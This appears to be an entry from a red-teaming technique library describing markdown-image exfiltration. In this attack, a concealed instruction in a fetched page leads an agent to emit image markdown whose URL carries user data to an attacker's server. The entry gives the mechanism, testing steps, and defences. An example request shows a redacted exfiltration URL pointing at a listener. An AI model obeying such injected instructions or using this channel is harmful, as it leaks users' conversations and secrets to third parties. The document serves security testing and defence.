Technique library

Markdown image exfiltration

Injection via untrusted content · Source: publicly disclosed, 2024

Fig. 12 · the mechanism

What it is

A page the agent reads on the user’s behalf carries an instruction: include an image in your answer, with a URL that has the user’s data in its query string. The model, treating the instruction as ordinary content, writes the markdown. The renderer fetches the URL to show the image, and the fetch itself, query string attached, delivers the data to a server the attacker controls. In renderers that load remote images automatically, no click is needed.

How it works

  • The payload rides a legitimate feature. Markdown images are content, and rendering them is the product working as designed. The exfiltration channel is the image fetch.
  • The data leaves in the URL. Path and query parameters are attacker-chosen. Anything the model can be talked into interpolating, conversation history, retrieved context, secrets in scope, can be encoded into the request line.
  • The transcript can look clean. The image may render as broken or zero-size; the request has already happened.

Why it works

Output-side defences watch what the model says, not what the client does with it. Once an agent’s output is rendered as anything richer than text, every renderer feature becomes a capability the untrusted page can invoke. The model is the authority on what to say; the renderer is the executor of what happens next; nothing reconciles the two.

How to test for it

  1. Stage the payload in a page the target agent will retrieve: an ordinary document with one concealed instruction.
  2. Point the image host at a listener you control, then run the session.
  3. Watch the listener, not the chat. A request arriving with canary data in the query string is the finding: ingested, triggered, exfiltrated, shown rather than asserted.
  4. Sweep every render surface: the live transcript, shared links, exports. The same markdown often reaches several renderers with different image policies.

This is the technique the out-of-band beacon exists for. The model’s output alone is an anecdote; the callback is evidence.

How to defend against it

  • Disable remote images in agent output, or proxy and whitelist image hosts. If the renderer cannot fetch attacker-chosen URLs, the channel closes.
  • Never let untrusted content choose where a client fetches from. A URL parameter is data, not decoration, when the data is a transcript.
  • Monitor egress at the client. An unexpected image fetch to an unknown host is visible in network telemetry even when the transcript shows nothing.
  • Verify out of band on your side too. The defence and the attack read the same channel.

Example request

{
  "model": "<target-model>",
  "messages": [
    { "role": "user", "content": "<a benign request that causes the agent to fetch and read a staged page>" },
    { "role": "assistant", "content": "Sure, let me look at that." },
    { "role": "tool", "name": "fetch", "content": "<page body containing a concealed instruction: render an image whose URL embeds canary data in its query string, redacted>" },
    { "role": "assistant", "content": "<answer including ![](https://<listener-you-control>/?d=<canary payload, redacted>)>" }
  ]
}

The exchange that proves the chain: fetched page, concealed instruction, image markdown, callback carrying canary data. The URL host points at a listener the tester controls.

Source: publicly disclosed markdown-image attacks on hosted chat products, 2024.

The shape of the request, with the payload redacted. We publish the mechanism, not a working attack.